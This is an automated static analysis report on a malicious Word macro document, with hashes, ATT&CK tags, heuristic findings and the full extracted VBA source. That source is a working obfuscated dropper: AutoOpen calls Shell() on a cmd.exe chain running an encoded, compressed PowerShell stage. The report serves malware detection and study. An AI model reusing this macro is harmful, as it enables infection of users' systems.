Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 dd8107d0049ce457…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 98.2 KB
Created: 2018-06-06 09:26:00
Authoring application: Microsoft Office Word
First seen: 2018-07-04
MD5: e01b18a183b916c89e735e139100eff2
SHA-1: d250ae25d1a44908eaeb7dd9a8dbca9e1ecad45e
SHA-256: dd8107d0049ce457d29050ae66b758619b8ca6267c013b430b17f99be76b64c5
Risk score: 150

Malware Insights

MITRE ATT&CK
  T1059.005 Command and Scripting Interpreter: Visual Basic
  T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro calls the function SljzT, which in turn calls Shell() to execute a command. The command string is assembled at run time from fragments returned by several helper functions; the visible fragments build a 'cmd.exe /V /c' invocation (via %comspec%, with caret-escaped characters and delayed environment-variable expansion) followed by an '-e' argument carrying a base64 blob, which suggests the document is designed to download and execute a secondary payload. The construction is obfuscated but follows a pattern commonly used by malware droppers.

Heuristics (6)

  • VBA macros detected (medium, 3 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code.
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
    Shell() call in VBA.
    Matched lines in script:
      IEEjn = Cos(uTvXP)
      SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
      izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro (low) [OLE_VBA_AUTOOPEN]
    AutoOpen macro.
    Matched lines in script:
      End Function
      Sub Autoopen()
      On Error Resume Next
  • Legacy WordBasic auto-exec macro marker (medium) [OLE_LEGACY_WORDBASIC_AUTOEXEC]
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
      URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10046 bytes
SHA-256: 1710601405cb55628b4f25d401efb201960ca66a5ccd8250b06cfbfd37584470

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "wKjjNDCSzIPZR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function SljzT()
On Error Resume Next
TYZuF = Hex(rdzJFf + Hex(UPSiLs) * 68661 + Round(nBowUm))
nzSiYE = Cos(vrpmi)
cVEimz = CDate(MNIfH)
IjWkv = Cos(owpArb)
kzTap = Hex(JsRSw + Hex(MXTja) * 83910 + Round(WXwpZG))
ButnVM = Cos(fNUsm)
FwIrN = CDate(biNVR)
IEEjn = Cos(uTvXP)
SljzT = zthjv + Shell(fiZTEZv + Chr(rzYFINWIdU + vbKeyC + blFapLaXU) + aQvPhPoDb + MdBoYR + jiOWRod + ZXjoBL + zEjHZHRNrbA, 70128 - 70128)
izkGjK = Hex(ooYjYO + Hex(bzfKo) * 48128 + Round(YMHzvZ))
wSXij = Cos(NQpUC)
WdajY = CDate(Uifuok)
qWFkcH = Cos(klpVAw)
End Function
Sub Autoopen()
On Error Resume Next
ErLJLI = Hex(CzzcjT + Hex(qhDinz) * 86595 + Round(HjNNQR))
nEjZqQ = Cos(Ukcbwn)
HHsoK = CDate(EmrNzw)
kiwzr = Cos(SMttK)
SljzT
KzMSBL = Hex(FQAYU + Hex(GXfAN) * 41472 + Round(uzGqo))
kcVLOO = Cos(LzusUp)
wqAkF = CDate(YlwmLf)
khLtV = Cos(WbakFl)
End Sub


Attribute VB_Name = "mNGdnjYT"
Function aQvPhPoDb()
On Error Resume Next
znUdCo = Hex(cVAZN + Hex(fkOtD) * 65864 + Round(XZEZaU))
CPEwA = Cos(UBCBVo)
pKoXZh = CDate(RLSfY)
SVYiu = Cos(hXRMQ)
whiWX = "md nTw" + "zpWzaWd" + "Dw i" + "pEzAQ" + "bi" + "MzWzBBkCP AR"
ZfAih = Hex(YOmAN + Hex(hAtRAr) * 95221 + Round(aoOwd))
HSGYY = Cos(XVzBCn)
GGJZRH = CDate(BuJPXZ)
rblQB = Cos(NEGHO)
wCYSzhDfuVS = "jYYtlS &" + "     %^c^o^m" + "^S^p^E^c^" + "%     %^c^o^m" + "^S^p^E^c^%    " + " /V    "
QOLArO = Hex(OrSQO + Hex(rqTMJr) * 1907 + Round(iftOlB))
PBACKp = Cos(YptSAK)
XYLWT = CDate(KuszQ)
dhiRm = Cos(MawpS)
EMDjPu = "     " + "/c         " + "  set %qslm" + "vWdDzJjzpf" + "F%=VsdsUwpUNvv" + "&&set " + "%HGnuERbpk" + "l%=p&&s"
EHASd = Hex(qqqnL + Hex(irRsb) * 40710 + Round(DlwLJ))
XGMnjM = Cos(GzSLIs)
YGZXq = CDate(bjvoU)
djOcHw = Cos(cFMiCH)
wiokaTr = "et %VFWpEGpZZl" + "ARO%=o^w&&set" + " %HzQfGO" + "zlmaLJzUw%" + "=aV" + "QRVMI&&set %IPX" + "iqToY%=!%HG" + "nuERbpkl%!&&s"
dAlYFj = Hex(EkzLZV + Hex(NoLYTk) * 67940 + Round(rULPR))
LLcXP = Cos(sbwWi)
PZvRQh = CDate(DPRBGj)
rcIQN = Cos(STsZUo)
pcNWwkhlY = "et %" + "DjQswuCRYzbVDhi" + "%=k" + "stSzKjd" + "YVs&&set %VnCTC" + "Uo" + "uN%=e^r&&se" + "t %KXhHjAp" + "pJmZ%" + "=!%V"
Gvlpo = Hex(iUKFZD + Hex(oOAuKV) * 76710 + Round(XPThJs))
wjWwc = Cos(UHdbM)
AChXi = CDate(jCDTw)
zAQij = Cos(IfzQY)
cpkdV = "FWpEGpZZlARO%!&" + "&set %" + "hpjKi" + "Gwb%=s&&set " + "%Owwia" + "vqNwpWwqjJ" + "%=" + "JYzuXwv"
idbFTH = Hex(SwFnq + Hex(slUZqO) * 55193 + Round(IzbHmb))
TjTkd = Cos(oFlii)
wfQtNZ = CDate(ojnGHB)
vafzzh = Cos(LzRmDN)
ZPVmc = "jZbuJ&&se" + "t %DrojVTM" + "iiIoGp%=he&&" + "set %fi" + "dY" + "WiQwar%=ll&&!"
DjjvHS = Hex(CsDOit + Hex(ijaLii) * 16971 + Round(ZmhAP))
jwHKMF = Cos(AEKziP)
hbkPot = CDate(TqaUfd)
GwOHDv = Cos(twEVn)
cLDWMEXjrpG = "%IPXiqToY%!!" + "%KXhHjAppJm" + "Z%!!%Vn" + "CTCUouN%!" + "!%hpjKiGwb%!!%D" + "rojVTMiiI" + "oGp%" + "!!%" + "fi"
icPMz = Hex(QjwCR + Hex(WENHh) * 79329 + Round(cvtHwr))
UWofft = Cos(rCqbO)
MNHHu = CDate(vhrJmO)
oLGkU = Cos(UTwts)
HwtwCz = "dYWiQwar%!" + "  -e KABuA" + "EUAdwAtAG" + "8AQgBqAGUAQ" + "wB0ACAAU" + "wBZAFMAd" + "ABFAG" + "0A" + "LgB" + "JAG8AL"
WXLiB = Hex(jTTUP + Hex(mNAwwd) * 25497 + Round(QQFok))
WItBO = Cos(PoXYj)
pmGvv = CDate(wSwHS)
VVjrD = Cos(RXuiA)
XKCFaHbuIbk = "gBjAE8ATQBwA" + "FIARQB" + "TAHMAS" + "QBPA"
aQvPhPoDb = whiWX + wCYSzhDfuVS + EMDjPu + wiokaTr + pcNWwkhlY + cpkdV + ZPVmc + cLDWMEXjrpG + HwtwCz + XKCFaHbuIbk
End Function
Function MdBoYR()
On Error Resume Next
ZSGvY = Hex(qbMwna + Hex(UUmsSU) * 28923 + Round(VjtnYl))
GMIGm = Cos(WdMBtA)
qLYiG = CDate(ilffbO)
hDlNIA = Cos(ZUAoj)
pWQIYs = "E4AL" + "gBkAEUAR" + "gBMAEEAVABlAF" + "MAdABSAGUA" + "YQBtACgAWwB" + "zAFkAUw" + "BU" + "AE" + "UAbQAuAEkAbwA"
NwrarY = Hex(zzKHL + Hex(cDfbhj) * 85179 + Round(ASrws))
osVLkB = Cos(hjuEo)
vnhsi = CDate(bYItt)
HnmMj = Cos(bwfiF)
wfNfMK = "uAE0AZQBtAE8AU" + "gB5AF" + "MAdAByAGUA" + "YQBtA" + "F0AIABbAEMA" + "bwBO" + "AFYARQByAFQ" + "AXQA6ADoAZgB"
zXJOuU = Hex(XtdzOT + Hex(MwRVj) * 96715 + Round(scOjVD))
dpXQhD = Cos(GtMdoI)
ZiqXt = CDate(nijKw)
CHvvi = Cos(RruDG)
QvzXwAuT = "SA" + "E8AbQBiAGEAUwB" + "lADYA" + "NABTAFQAcg" + "BpAG" + "4AZwAoACcAVgB" + "WAEIAZABTADgAT" + "gBBAEUAUAB" + "3AHIAOQAzAEMAUQ" + "BCAEoA"
hPjGDF = Hex(spGSwX + Hex(bwGwI) * 24188 + Round(ZAmLw))
DXRbWY = Cos(qdahb)
SGRvpz = CDate(awUlw)
tOHPuu = Cos(boUYi)
hALRKVfp = "cwBMAEkAaA" + "BiAGEAUQA2A" + "Go" + "AWQBGA" + "GgAKwBNA" + "EYATgBMA" + "DYAaABTAE" + "MAWAB" + "5A"
MdBoYR = pWQIYs + wfNfMK + QvzXwAuT + hALRKVfp
End Function
Function jiOWRod()
On Error Resume Next
ZNRzWY = Hex(htLHE + Hex(OaDECf) * 60543 + Round(iwjOfm))
AiltQ = Cos(XKIBzM)
NACzK = CDate(jfXjSs)
TvQiiq = Cos(AjOaOn)
aUXVlPRZP = "DUA" + "cQBjAFQAZQA3AEM" + "AWgBmAHQ" + "ARgB5AEgALw" + "AzAE4ASwBuAGcAe" + "QA4AEwAdQB" + "6AE8AegBNAEw" + "AaQAyADIAa" + "QA3AGYAN" + "wBGADMASgBEAE"
rPuDE = Hex(GOitj + Hex(iFqcv) * 36406 + Round(RabtZ))
HaYjl = Cos(lWupPd)
NZtFQX = CDate(iHjJET)
NWcPV = Cos(kzthh)
XIcwT = "4AQgB" + "4AEMAawAzA" + "DYAQgBSAEcASw" + "BGAHoAaw" + "B6AEYANgBX"
SzhoQb = Hex(PFbYVL + Hex(aoztO) * 55448 + Round(TYARZ))
IvQjLX = Cos(ECwTP)
EDClzH = CDate(zuvzz)
EbwYh = Cos(qhqUo)
iIitijbGIW = "ADYAWgByAHU" + "AeAAvAEs" + "ARA" + "BrADEAQwB" + "CAFYANwBCAEcAVA" + "BQAGsATgA2" + "AFYAQwBqAFIAeQB" + "hAHAALwBxAFIAag" + "BxAGkAVgB5AE" + "QAV"
MznRXs = Hex(djXORm + Hex(KWuNz) * 36724 + Round(tTvGdO))
YANiOq = Cos(JPhWDR)
mjNhm = CDate(MUndVV)
TisLu = Cos(iFfKfD)
iDMcp = "wAwAHkAa" + "QBxAG8A" + "VQBHAFYARwA4" + "ADIASwBYAF" + "oAUQBMAEIAQQB" + "aAEg" + "AbQBBADMAWQ" + "BYAHAAU" + "gBn" + "AFYAVABWA"
QAGMrv = Hex(KGmiZ + Hex(jlENkN) * 85595 + Round(RfXWcZ))
QHWhiq = Cos(LOama)
DNrJl = CDate(uzBRZ)
KTwUi = Cos(OVSuzP)
FZEih = "GgAMABsAFIAL" + "wBvAE0AZQB" + "TAHU" + "AbABU" + "AG8AZQB6AE0AdgA" + "0AFAAVA" + "BoAG" + "QAYgAyAF"
uAUZp = Hex(wmYYEn + Hex(kZflP) * 80185 + Round(PTXPrj))
XEBJNb = Cos(rCaYL)
afmuuj = CDate(Fpphi)
SlbdE = Cos(ICbhXP)
sKEcwzRqin = "oAdQAzAFcAMA" + "BEADgAYwAwAE" + "gATgBHAC8AS" + "ABKAEgAeAA5A" + "FcAU" + "gA4AE4A" + "WABHAEUASwB" + "zADUAcwBqAEQAOA" + "BNADAA"
LEtXFN = Hex(LWjhc + Hex(KLfiO) * 38806 + Round(EJXPYV))
CbzzOi = Cos(UPLSk)
awwBu = CDate(iXwXs)
ClmCj = Cos(wjXBjW)
RtThzt = "UAB1AHAAQwAxAFM" + "AVABD" + "ACsASwA" + "5AGU"
SzSpwT = Hex(iADGN + Hex(VYmRF) * 8293 + Round(iLtQS))
hUAwZO = Cos(QbCPi)
DdoCh = CDate(pKIazF)
fQGGEC = Cos(MmvdD)
dPamZia = "ANgA0AE8AWQB0AG" + "YAKwA3AHUAV" + "wBmAHgAbwB" + "LAFEAaABV"
roFtVW = Hex(EAdqJL + Hex(cYZuDq) * 58310 + Round(IJVwNL))
RhKwDp = Cos(FOEaW)
imQzsT = CDate(oMBaNz)
fvYWJ = Cos(QivfK)
NRQMquFflW = "ADgA" + "VA" + "BJ" + "ADkAWABxAG" + "wAaQBoAE4AK"
ubTKp = Hex(UnEWtY + Hex(uQzEj) * 68901 + Round(EjVJpi))
wZvqk = Cos(kYSVCM)
sLEICA = CDate(PHRiP)
ZENFJU = Cos(MWNIf)
Gtojlzjw = "wByAGgAQg" + "BpAC" + "8AYgBVADkAag" + "BlAHkAdQBUAG4A" + "bwAwAG8AaABzA" + "HEA" + "VQBvAD" + "QAVQA5AG4AYQBK" + "AEcAaQBWA" + "HoAdgAxAGc"
jiOWRod = aUXVlPRZP + XIcwT + iIitijbGIW + iDMcp + FZEih + sKEcwzRqin + RtThzt + dPamZia + NRQMquFflW + Gtojlzjw
End Function
Function ZXjoBL()
On Error Resume Next
lVVzd = Hex(Tmssc + Hex(GpRBq) * 16443 + Round(boNjL))
LhFlW = Cos(vdtPvt)
nbwKj = CDate(ksCfp)
fFqEU = Cos(pJkSU)
mPbtAhc = "AUgBBAG" + "IATABnAE" + "MAYwB" + "vA" + "EwASQBZ" + "AHIAYQB5AFE" + "AMAB" + "6AFgAb"
AWujj = Hex(aWHhV + Hex(fihUaU) * 16831 + Round(ParsF))
YrFkY = Cos(HhJKR)
JpFTD = CDate(kAZqqV)
QJRwZf = Cos(bKoiQ)
UtWbnU = "gBNAFUAMgBlAHkA" + "NQBaADAAVQBLA" + "EkAdgAyAFkAQg" + "BWAEMAVwBKAG" + "cARw" + "BDAGYAMQBnA" + "GkANgBP" + "AEUARwBwAFYAN" + "wBSAHUAdwBVAEk"
IAizU = Hex(CWLTz + Hex(XsIEzi) * 965 + Round(AHLqik))
PcwAWC = Cos(pkScVT)
MFqUD = CDate(mtWKG)
jWAosO = Cos(rmuMSb)
pRRrF = "AZwBmAGUA" + "ZABkADgAPQA" + "nACAAKQAsACAA" + "WwBzAF" + "kAUw" + "BUAGUATQAuAEk" + "Abw" + "AuAE" + "MAbwBNAFA" + "AU"
rDYmXM = Hex(QoCVWf + Hex(tWFotn) * 42153 + Round(ovZNl))
jSsXsK = Cos(jVjmu)
QiwTW = CDate(CwQoYY)
WiOcNK = Cos(EkWJzd)
BstFCGhPM = "gBlAF" + "MAUwBpAE8A" + "bgAuAGMAb" + "wBtAHAAUgBl" + "AHMAcwBJ" + "AG8ATgB" + "NAG8ARABlA" + "F0AOgA6AEQAZQBD" + "AE8ATQBQAFI"
YJAWB = Hex(mFaqcD + Hex(idPdUw) * 10311 + Round(bUsWcT))
fMoVsM = Cos(oPRWZB)
HXAJi = CDate(bUsozX)
wpIzYj = Cos(ZOCGKS)
wIJrjnfBEB = "AZQBzAFMAKQ" + "B8AEYAbwBSA" + "EUAYQ" + "BDAGgAewAgAG4A" + "RQB3AC0AbwBCAGo" + "AZQBDAHQAIA" + "Bp" + "AG8ALgBzAHQAc"
oALwZ = Hex(VTzrN + Hex(aVLTzW) * 40507 + Round(hzHSzs))
rsVuw = Cos(omUjq)
TMcsQ = CDate(bGTOuC)
poWpst = Cos(jsdbb)
fawVXVBIBa = "gBFAGEATQBSAG" + "UAQQBEAGUAUg" + "AoACAAJABfACAAL" + "AB" + "bAFQARQB4" + "AH" + "QALgB" + "FAG4AQwBPAEQ"
Okmjqn = Hex(wBRFH + Hex(fWmsdw) * 36554 + Round(JYRzb))
ptbiBQ = Cos(XqTkX)
snoWR = CDate(CNitzA)
InFMUl = Cos(AUDZi)
RnpMap = "ASQB" + "OAEcAXQA6ADo" + "AQQBTA" + "EMASQ" + "BpACkAIAB9" + "AHwA" + "IABmAE8AcgBlA" + "EEAQwBIACAAewA" + "kAF8ALgBSAE" + "UAQQBkAFQATwBFA"
ZXjoBL = mPbtAhc + UtWbnU + pRRrF + BstFCGhPM + wIJrjnfBEB + fawVXVBIBa + RnpMap
End Function
Function zEjHZHRNrbA()
On Error Resume Next
qXHjT = Hex(GqaWU + Hex(zPZZK) * 99046 + Round(iYIfSd))
wIGYjO = Cos(OriFwa)
tmiRkK = CDate(WpbJE)
ziispC = Cos(JwkBm)
jitpJziz = "G4AZAAoACkAf" + "QApACAA" + "fAAm" + "ACgAIAA" + "kAHYAR" + "QByAEIATwB" + "zAGUAUAByAE"
NlYuT = Hex(ZlomZ + Hex(hTdcS) * 60211 + Round(fRojI))
QwGhvB = Cos(iiwjzu)
zfMLs = CDate(iHiqj)
EmHoZC = Cos(IDQSD)
bWrMsbrXqb = "UARgBFAHIAZ" + "QBO" + "AGMA" + "ZQAuAF" + "QAbwBTAFQAUgB" + "JAE4ARwAoACkA" + "WwAxACwAMwB" + "dACs"
ksjDXu = Hex(YXRAFc + Hex(zIINPB) * 31126 + Round(uXqWhi))
EhMJSH = Cos(uELwB)
hVGiz = CDate(PzvCD)
cnwLM = Cos(NwmTk)
QDoRaakXsuG = "AJ" + "wB4AC" + "cALQBqA" + "E8ASQBuAC" + "cAJwApAA=="
zEjHZHRNrbA = jitpJziz + bWrMsbrXqb + QDoRaakXsuG
End Function